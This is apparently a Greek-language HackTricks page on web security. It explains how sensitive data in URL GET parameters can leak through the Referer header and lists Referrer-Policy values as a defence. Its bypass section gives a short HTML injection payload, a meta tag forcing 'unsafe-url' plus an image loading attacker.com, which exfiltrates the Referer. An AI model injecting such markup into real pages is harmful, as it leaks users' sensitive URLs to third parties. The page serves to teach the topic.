3.6 KiB
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking: 
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Κοινοποιήστε τεχνικές χάκερ καταθέτοντας PRs στα αποθετήρια HackTricks και HackTricks Cloud στο github.
Επικεφαλίδες αναφοράς και πολιτική
Η επικεφαλίδα Αναφοράς (Referrer) χρησιμοποιείται από τους περιηγητές για να υποδείξουν ποια ήταν η προηγούμενη επισκεφθείσα σελίδα.
Διέρρευση ευαίσθητων πληροφοριών
Εάν σε κάποιο σημείο μέσα σε μια ιστοσελίδα βρίσκονται ευαίσθητες πληροφορίες στις παραμέτρους αιτήσεων GET, εάν η σελίδα περιέχει συνδέσμους προς εξωτερικές πηγές ή ένας επιτιθέμενος είναι σε θέση να δημιουργήσει/προτείνει (κοινωνική μηχανική) στον χρήστη να επισκεφθεί μια διεύθυνση URL που ελέγχεται από τον επιτιθέμενο, θα μπορούσε να εξαγάγει τις ευαίσθητες πληροφορίες μέσα στην τελευταία αίτηση GET.
Αντιμετώπιση
Μπορείτε να κάνετε τον περιηγητή να ακολουθήσει μια πολιτική αναφοράς (Referrer-policy) που θα αποτρέψει την αποστολή των ευαίσθητων πληροφοριών σε άλλες εφαρμογές ιστού:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Αντι-Μείωση-Αντίστασης
Μπορείτε να παρακάμψετε αυτόν τον κανόνα χρησιμοποιώντας ένα ετικέτα μεταδεδομένων HTML (ο επιτιθέμενος χρειάζεται να εκμεταλλευτεί μια ενσωμάτωση HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Άμυνα
Ποτέ μην τοποθετείτε ευαίσθητα δεδομένα μέσα σε παραμέτρους GET ή διαδρομές στο URL.